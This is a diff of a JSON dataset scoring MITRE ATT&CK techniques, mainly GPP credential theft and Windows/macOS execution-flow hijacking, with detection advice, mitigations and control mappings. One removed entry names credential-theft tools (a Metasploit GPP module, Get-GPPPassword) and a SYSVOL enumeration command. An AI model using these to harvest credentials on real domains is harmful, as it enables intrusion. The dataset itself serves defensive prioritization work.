-                "url": "https://attack.mitre.org/techniques/T1552/006",
-                "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n",
-                "detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)",
+                "tid": "T1574.009",
+                "name": "Hijack Execution Flow: Path Interception by Unquoted Path",
+                "url": "https://attack.mitre.org/techniques/T1574/009",
+                "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n\nService paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\program.exe\"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\\program files\\myapp.exe, an adversary may create a program at C:\\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)\n\nThis technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.",
+                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
                 "mitigations": [
                     {
-                        "mid": "M1015",
-                        "name": "Active Directory Configuration",
-                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1015"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
                     },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1574.010",
+                "name": "Hijack Execution Flow: Services File Permissions Weakness",
+                "url": "https://attack.mitre.org/techniques/T1574/010",
+                "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
+                "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ",
+                "mitigations": [
                     {
                         "mid": "M1047",
                         "name": "Audit",
@@ -14473,47 +37076,68 @@
                         "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
+                        "mid": "M1052",
+                        "name": "User Account Control",
+                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                        "url": "https://attack.mitre.org/mitigations/M1052"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1552.007",
-                "name": "Unsecured Credentials: Container API",
-                "url": "https://attack.mitre.org/techniques/T1552/007",
-                "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ",
-                "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+                "tid": "T1574.011",
+                "name": "Hijack Execution Flow: Services Registry Permissions Weakness",
+                "url": "https://attack.mitre.org/techniques/T1574/011",
+                "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)",
+                "detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
                 "mitigations": [
                     {
-                        "mid": "M1035",
-                        "name": "Limit Access to Resource Over Network",
-                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1035"
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    }
+                ]
+            },
+            {
+                "tid": "T1574.012",
+                "name": "Hijack Execution Flow: COR_PROFILER",
+                "url": "https://attack.mitre.org/techniques/T1574/012",
+                "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)",
+                "detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
                     },
                     {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1015",
-                "name": "Active Directory Configuration",
-                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1015"
+                "mid": "M1013",
+                "name": "Application Developer Guidance",
+                "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                "url": "https://attack.mitre.org/mitigations/M1013"
             },
             {
                 "mid": "M1047",
@@ -14522,122 +37146,308 @@
                 "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
             },
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
+                "mid": "M1044",
+                "name": "Restrict Library Loading",
+                "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
+                "url": "https://attack.mitre.org/mitigations/M1044"
             },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 1.8261904761904764,
+        "adjusted_score": 1.8261904761904764,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "16.13",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "RA-5",
+            "SI-10",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.47619047619047616,
+            "mitigation_score": 0.6545454545454545,
+            "detection_score": 0.28
+        },
+        "choke_point_score": 0.35,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1574.001",
+        "name": "Hijack Execution Flow: DLL Search Order Hijacking",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
+        "url": "https://attack.mitre.org/techniques/T1574/001",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1044",
+                "name": "Restrict Library Loading",
+                "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
+                "url": "https://attack.mitre.org/mitigations/M1044"
+            }
+        ],
+        "cumulative_score": 0.47619047619047616,
+        "adjusted_score": 0.47619047619047616,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.1",
+            "16.13",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "RA-5",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1574.002",
+        "name": "Hijack Execution Flow: DLL Side-Loading",
+        "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)",
+        "url": "https://attack.mitre.org/techniques/T1574/002",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1013",
+                "name": "Application Developer Guidance",
+                "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                "url": "https://attack.mitre.org/mitigations/M1013"
             },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "16.13",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-16",
+            "SA-17",
+            "SA-3",
+            "SA-4",
+            "SA-8",
+            "SI-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1574.004",
+        "name": "Hijack Execution Flow: Dylib Hijacking",
+        "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)",
+        "url": "https://attack.mitre.org/techniques/T1574/004",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1574",
+        "subtechniques": [],
+        "mitigations": [
             {
                 "mid": "M1022",
                 "name": "Restrict File and Directory Permissions",
                 "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
-            {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 1.0690183395238095,
-        "adjusted_score": 1.0690183395238095,
-        "has_car": true,
+        "cumulative_score": 0.2666666666666667,
+        "adjusted_score": 0.2666666666666667,
+        "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "3.1",
-            "3.11",
-            "3.12",
-            "3.2",
-            "3.3",
             "4.1",
-            "4.2",
-            "4.5",
-            "4.7",
-            "5.2",
-            "5.3",
-            "5.4",
             "6.1",
             "6.2",
-            "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.5",
-            "11.3",
-            "14.3",
-            "14.4",
-            "14.9",
-            "16.1",
-            "16.9",
-            "18.3",
-            "18.5",
-            "13.10"
+            "6.8"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
             "AC-2",
-            "AC-20",
             "AC-3",
             "AC-4",
             "AC-5",
             "AC-6",
             "CA-7",
-            "CA-8",
             "CM-2",
-            "CM-5",
             "CM-6",
-            "CM-7",
-            "IA-2",
-            "IA-3",
-            "IA-4",
-            "IA-5",
+            "CM-8",
             "RA-5",
-            "SA-11",
-            "SA-15",
-            "SC-12",
-            "SC-28",
-            "SC-4",
-            "SC-7",
-            "SI-10",
-            "SI-12",
-            "SI-15",
-            "SI-2",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
@@ -14645,952 +37455,684 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.6095238095238096,
-            "mitigation_score": 1,
-            "detection_score": 0.18
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.10949453
+        "hardware_coverage": false
     },
     {
-        "tid": "T1553",
-        "name": "Subvert Trust Controls",
-        "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ",
-        "url": "https://attack.mitre.org/techniques/T1553",
+        "tid": "T1574.005",
+        "name": "Hijack Execution Flow: Executable Installer File Permissions Weakness",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
